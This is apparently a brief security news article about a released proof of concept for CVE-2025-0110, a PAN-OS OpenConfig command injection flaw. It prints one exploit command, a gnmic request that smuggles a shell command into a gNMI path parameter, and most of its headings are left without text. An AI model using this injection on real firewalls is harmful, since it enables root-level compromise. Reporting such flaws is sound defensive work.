Site icon TheCyberThrone

Google Released PoC for CVE-2025-0110 PAN OS Flaw

Advertisements

Google’s Project Zero and Mandiant cybersecurity teams have jointly released a proof-of-concept (PoC) exploit for a significant security vulnerability identified in Palo Alto Networks’ PAN-OS OpenConfig plugin. This vulnerability, tracked as CVE-2025-0110, allows authenticated administrators to execute arbitrary commands on firewalls via manipulated gNMI requests, potentially escalating their privileges to root access.

Vulnerability Details

Nature of CVE-2025-0110

Exploitation

Attack Vector

./gnmic -a <IP>:9339 -u admin --password=<PASSWORD> --skip-verify \ --path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)]'

This command utilizes the gNMI client (gnmic) to send a request that includes the injected command within the type parameter. When processed by the vulnerable PAN-OS device, the injected command is executed with elevated privileges.

Impact and Risks

Unauthorized Command Execution

Mitigation Measures

Immediate Actions

Long-Term Strategies

Final Thoughts

The release of the PoC for CVE-2025-0110 underscores the critical importance of timely security updates and robust access controls. By understanding the nature of the vulnerability and its potential impact, and by implementing the recommended mitigation measures, organizations can better protect their systems from potential exploitation.

Exit mobile version